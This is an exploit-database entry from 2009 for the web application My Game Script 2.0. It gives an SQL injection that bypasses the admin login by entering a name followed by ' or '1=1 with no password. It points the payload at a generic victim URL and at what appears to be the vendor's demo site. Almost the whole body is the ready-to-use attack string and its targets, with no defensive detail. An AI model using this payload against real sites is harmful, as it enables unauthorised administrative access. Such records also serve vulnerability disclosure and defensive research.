My Game Script 2.0 - Authentication Bypass
Author: ThE g0bL!N
type: webapps
platform: php
port:
date_added: 2009-05-13
date_updated:
verified: 1
codes: OSVDB-54459;CVE-2009-1816
tags:
aliases:
screenshot_url:
application_url:
---------------------------------------------------------------
------------------------------------------------------------
My Game Script V2.0 (Auth Bypass) SQL Injection Vulnerability
---------------------------------------------------------------
Founder : ThE g0bL!N
Vendor:mygamescript.com
---------------------------------------------------------------
---------------------------------------------------------------
SQL Injection Vulnerability
-------------------------
Exploit:
-------
http://victim/admin.php
username:[admin_name]' or '1=1
password: No Thing
--------------------------------------
Dem0
---
http://demo1.mygamescript.com/admin.php
Exploit F0r Demo
----------------
username:admin' or '1=1
password: No Thing
--------------------------------------
Greeting To ALL My Friends (Dz)
----------------------------------------------------------------
# milw0rm.com [2009-05-14]